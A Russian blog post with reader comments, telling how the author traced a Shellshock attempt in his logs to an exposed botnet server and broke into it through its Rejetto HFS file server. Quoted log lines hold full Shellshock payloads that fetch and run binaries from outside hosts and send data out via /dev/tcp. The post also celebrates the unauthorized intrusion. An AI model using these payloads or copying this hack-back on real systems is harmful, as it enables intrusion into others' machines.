Или не грози солнечной Исландии, попивая чай у себя в Гуaнчжоу.

image

На КДПВ изображен возможный ботнет оператор, как я его себе представляю.
Технических подробностей будет минимально, в основном глум. Добро пожаловать.

Боты


Началось все стандартно, ничего не предвещало беды — субботним вечером я решил почистить переполнившийся /var/log на веб сервере. Ввиду специфики данного сервера, логи на нём не являются сколько нибудь значимыми, как и факт переполнения раздела; ну, разве что мониторинг начинает писать чаще, да новые события не анализируются. В процессе чистки выяснилось что боты все так-же упорно ломятся подбирать пароль рута на ssh, пытаются найти пхп который бы выполнил их квадратно-гнездовые пожелания, да периодически сканят то, чего сканить смысла не имеет. Тишь да благодать одним словом. Разве что глаз цепляется за странно большие запросы в логах:

1.2.3.4 - - [20/Mar/2015:18:39:36 +0000] "GET / HTTP/1.1" 200 14932 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.x.y:911/x26 -O /tmp/China.Z-bdzm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bdzm >> /tmp/Run.sh;echo /tmp/China.Z-bdzm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.x.y:911/x26 -O /tmp/China.Z-bdzm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bdzm >> /tmp/Run.sh;echo /tmp/China.Z-bdzm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22"

Вот он, shellshock. Особенно трогательно смотрится обязательное упоминание автора отдельным вызовом «echo By China.Z», это и сподвигло меня посмотреть, что же мне предполагается скачать и исполнить.

Бот-сервер


Сервер оказался открытым и живым, по хттп одавал список из замечательных файлов на все случаи жизни:

image

Не смотрите на директорию temp и пользователя adm, я не сразу догадался делать скриншоты. Вначале директории не было, вместо пользователя предлагалось залогиниться. Лучше посмотрите на аптайм сервера и количество хитов, или вот например на файл, как его видят антивирусы. Внутри конечно куча всего интересного — умеет ддосить разными способами, умеет даже майнить (в отличие от тебя, ЦБ :-), и распространяться (правда, неумело), но это топик не про реверс. Разве что примечательно, что strings выдает списки из нескольких десятков вкомпиленных IPv4 адресов, большинство конечно с Китая.

Замечательный сервер Rejetto HFS


Честно говоря, ни разу с ним не сталкивался, и если бы он так сильно не заявлял о своем присутствии на странице внизу, так бы я и ушел с этого сайта, потеряв интерес. Но это было сделать не судьба. У сервера оказался потрясающий функционал. Цитатка:
File manipulation

load | A

you'll love this one. You can specify A as a file name, or as a URL. It will load and expand to it.


Haha, god damn i will!

В дополнение у данной версии оказалась не только «технологическое отверстие», позволяющее воспользоваться всем этим замечательным функционалом используя простой netcat, но и готовый модуль к метасплойту для совсем ленивых. Поэтому сначала простым вгетом был сделан пользователь adm, и следом осуществлен выход из jail (или как там правильно называется оный аналог в виндоус) путем маппинга директории temp в корень диска C:\. Сон стремительно накрылся, любопытство одержало верх.

Для вуайеристов, несколько картинок типового окружения китайского ботмастера и потенциального биткоин-миллионера (судя по спискам майнеров, хехе):
Диск С:\

image

Диск D:\

image

Program Files:

image

Ничего примечательного, и ничего, чтобы хоть чуть-чуть могло помешать доступу. И разумеется, бонусом было то, что все работало из под учетной записи администратора. Из минусов — очень низкая скорость. Не исследовал, заслуга ли это китайского файрвола, или же просто загруженная машина, но улов был ограничен скоростью в пару сотен килобит в секунду, с пиками до мегабита. И да, все на китайском, что сильно затрудняло исследования, требуя итерацию через гугл-транслейт.

Улов


  1. Разнообразные бинарники для фана и профитатм.
  2. Полторы тысячи адресов зараженных машин (должно было быть больше, судя по количеству скачиваний вирусни, но либо файлы чистились, либо считались не хиты а не уники). Большинство Китай, отправлено абузой.
  3. Полторы сотни адресов с разбиением на группы — майнеры, лоадеры и еще какия-то делишки. Оставлено на сладкое.
  4. Можно было быть стелс ниндзей, засадить трояны и ботить ботоводов, но было поздно, было лень, и, честно говоря, товарищ майор, скилов то таких даже и нет. Посему режим тишины не соблюдался, сервер пищал/скрипел удаляя/копируя/файлы. И как результат, чувство, когда связь прерывается, и почти слышны матюки на китайском — бесценно.

качество ничто, лулзы всё
image

Минутка Капитана О



  • Не сидите под администратором;
  • Не запускайте веб-сервисы под администратором;
  • Своевременно обновляйте программное обеспечение;
  • Не держите ботнет-центр на домашних ПК;
  • Регулярно меняйте его адрес;
  • Настройте фаервол, даже если у вас нет ботнета;
  • На каждую хитрую задницу, найдется! (с)

Мы же, со своей стороны, свято верим в последний пункт, и продолжаем предоставлять рутовый доступ без пароля для «поиграться», теперь — с непатченным shellshock!

Надеюсь, вам понравилось. Если кому нужно для образовательных нужд чего — пишите в личку.

Комментарии (17)


  1. ximaera
    12.04.2015 15:44
    +5

    > вначале rm, а потом chmod и вызов

    Не так. Сначала echo rm в конец скрипта, а потом chmod и вызов скрипта. Всё нормально отработает.


    1. iaf Автор
      12.04.2015 18:10
      +5

      Благодарю, поправил, я быстро принимаю решения когда они неправильные :)


  1. XogN
    12.04.2015 16:52
    +3

    Читал и наслаждался.
    Приятно, когда поимели того, кто сам любил иметь других.


  1. Arlakz
    12.04.2015 17:20

    Интересно, а был ли бэкап? =DDDDD


    1. iaf Автор
      12.04.2015 18:23
      +5

      Был один, на диске D:\ ;-)

      Но, честно сказать, не думаю что он был последний, учитывая масштабы.
      Топик ни к коей мере не подразумевает уничтожение ботнета.


      1. BupycNet
        12.04.2015 20:53
        +3

        А насчет майнера, вы не искали у него на машине биткоин кошельки?


        1. iaf Автор
          13.04.2015 00:37

          Нет, не искал, было медленно и на китайском все :-)
          Но думаю это хостинг заразы, не более.


  1. artch
    13.04.2015 00:30
    +8

    <grammar mode on>

    ботнет оператор
    Правильно: оператор ботнета.
    Правильно, но не очень по-русски: ботнет-оператор.
    Правильно, но совсем не по-русски: botnet operator.

    Как в статье — неправильно.

    Больше о прилагательных и дефисах при переводе с английского можно прочитать на Хабре здесь.


    1. iaf Автор
      13.04.2015 00:44
      +1

      Плюсанул, спасибо, это была калька с английского — третий вариант, подобного много в статье. Моя конечно русская, но не граммматическая нациста совсем :-)


    1. dimitrimus
      13.04.2015 08:40
      +4

      Выключить режим забыли. Хотя… может так и задумано.


      1. lexfrei
        14.04.2015 00:12
        +3

        </grammar mode>
        Спосу хабр от граммотности.


  1. flx
    13.04.2015 12:31
    +1

    Спасибо! Давненько так не смеялся ;)


    1. iaf Автор
      13.04.2015 13:11
      +2

      Я тоже для себя внезапно «дивный новый мир» открыл :-)

      Вот, глума ради, еще прекрасное
      46.4.73.171 - - [13/Apr/2015:06:04:46 +0000] "GET / HTTP/1.1" 200 5762 "() { :;}; /bin/bash -c \x22echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo  ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\x22" "() { :;}; /bin/bash -c \x22echo ;cd /var/tmp;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21 echo  ;cd /var/spool/samba;curl -sO 68.178.173.183/g.tgz;wget -q 68.178.173.183/g.tgz;tar xvf g.tgz;rm -fr g.tgz*;cd z;sh a;cat ip > /dev/tcp/62.149.164.193/21\x22"
      

      Вот эта часть: «cat ip > /dev/tcp/62.149.164.193/21». Я понимаю, что без статистики в этом деле никуда, но хоть бы в бинарник спрятали.
      А раз так, то я не против туда дописать адресов, их много разных, мне не жалко :-)


      1. flx
        13.04.2015 13:18
        +1

        … хотя насчёт Вселенной я не уверен.
        image


  1. maeln0r
    13.04.2015 12:38
    +1

    Скорость можно повысить через прокси-сервер в Гонконге, если интересно. В континентальный Китай трафик режет фаервол(л?)


  1. alexanderzaytsev
    14.04.2015 14:09
    +1

    А не возникала мысль, что это машина не оператора, а такой же жертвы? Что ботнет распределенный и, типа, одноранговый? Что при заражении машина становится мастером для следующих?


    1. iaf Автор
      14.04.2015 14:22

      Конечно, была в чем-то похожая мысль из разряда «не навреди». Но по совокупности фактов была отброшена (списки файлов, бинарники под и атака на другую платформу). Такая же жертва в логе представлена адресом «1.2.3.4» в самом начале.